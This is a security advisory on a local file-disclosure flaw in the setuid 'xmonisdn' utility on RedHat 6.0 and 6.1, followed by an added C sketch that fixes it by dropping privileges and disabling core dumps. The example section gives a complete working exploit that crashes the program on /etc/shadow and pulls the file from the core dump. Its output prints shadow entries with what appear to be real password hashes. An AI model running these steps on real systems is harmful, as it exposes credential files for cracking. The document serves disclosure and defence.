'xmonisdn' allows reading of any local files under RedHat 6.x
--------------------------------------------------------------------------------


SUMMARY

'xmonisdn', a utility for monitoring and controlling ISDN-activity, 
contains a vulnerability that allows any user to read the content of any 
file he does not have direct read access to (for example, /etc/shadow). 
This can lead to immediate system compromise.

DETAILS

By issuing a few basic commands, any local user can cause the 'xmonisdn' 
program to crash (the program is setuid by default under Linux). The 
resulting core dump contains the content of the file that was passed to 
the program with the -file option.

Vulnerable systems:
RedHat 6.0 (default kernel)
RedHat 6.1 (default kernel)

Non-vulnerable systems:
SuSE Linux 6.1 and 6.2
RedHat 2.0.36
RedHat 2.2.12-OpenWall

Example:
# pwd; ls -al xmonisdn
/usr/bin
-rwsr-xr-x   1 root     root        13528 Mar  4  1998 xmonisdn
# xmonisdn -file /etc/shadow
Warning: Cannot convert string "netactive" to type Pixmap
Warning: Cannot convert string "netactiveout" to type Pixmap
Warning: Cannot convert string "netwaiting" to type Pixmap
Warning: Cannot convert string "netinactive" to type Pixmap
Warning: Cannot convert string "netstart" to type Pixmap
Warning: Cannot convert string "netstop" to type Pixmap

[1]+  Stopped                 xmonisdn -file /etc/shadow
# bg
[1]+ xmonisdn -file /etc/shadow &
# killall -8 xmonisdn
[1]+  Floating point exception(core dumped) xmonisdn -file /etc/shadow
# strings core|less

<snip>
/lib/ld-linux.so.2
root:$1$Fijz9O0n$ku/VSK.h6cbTV5oueAAwz/:10883:0:99999:7:-1:-1:134538500
bin:*:10878:0:99999:7:::
daemon:*:10878:0:99999:7:::
adm:*:10878:0:99999:7:::
lp:*:10878:0:99999:7:::
sync:*:10878:0:99999:7:::
shutdown:*:10878:0:99999:7:::
halt:*:10878:0:99999:7:::
mail:*:10878:0:99999:7:::
news:*:10878:0:99999:7:::
uucp:*:10878:0:99999:7:::
operator:*:10878:0:99999:7:::
games:*:10878:0:99999:7:::
gopher:*:10878:0:99999:7:::
ftp:*:10878:0:99999:7:::
nobody:*:10878:0:99999:7:::
xfs:!!:10878:0:99999:7:::
ronvdaal:$1$Dc92cqLj$V/HSANaVuwCMxGjFfZC/T0:10883:0:99999:7:-1:-1:134538492
syntonix:$1$h3yIM.h/$JjBLYPvb4Zcjv1tb.21Uw/:10883:0:99999:7:-1:-1:134538484
<snip>
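
Mitigation sketch (an added example, not part of the original advisory and not xmonisdn's code): a setuid program that accepts a file name can disable core dumps and open the file with the invoking user's real IDs, so a file the user cannot read is never loaded into memory. The function names are hypothetical, and prctl() is Linux-specific.

```c
#include <fcntl.h>
#include <stdio.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/types.h>
#include <unistd.h>

/* Stop the kernel from writing this process's memory to a core file. */
int disable_core_dumps(void)
{
    struct rlimit none = { 0, 0 };
    if (setrlimit(RLIMIT_CORE, &none) != 0)      /* portable: core size 0 */
        return -1;
    return prctl(PR_SET_DUMPABLE, 0, 0, 0, 0);   /* Linux: non-dumpable */
}

/* Open a user-supplied path with the caller's real IDs instead of the
 * setuid ones, so the kernel checks the invoking user's permissions. */
int open_as_invoker(const char *path)
{
    uid_t saved_euid = geteuid();
    gid_t saved_egid = getegid();
    int fd;

    if (setegid(getgid()) != 0 || seteuid(getuid()) != 0)
        return -1;
    fd = open(path, O_RDONLY);
    /* Regain the saved IDs; fail closed if that does not work. */
    if (seteuid(saved_euid) != 0 || setegid(saved_egid) != 0) {
        if (fd >= 0)
            close(fd);
        return -1;
    }
    return fd;
}

int main(int argc, char **argv)
{
    int fd;
    if (argc != 2 || disable_core_dumps() != 0)
        return 2;
    fd = open_as_invoker(argv[1]);
    if (fd < 0) {
        fprintf(stderr, "cannot open %s\n", argv[1]);
        return 1;
    }
    close(fd);
    return 0;
}
```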


ADDITIONAL INFORMATION

This vulnerability was found by Ron van Daal.
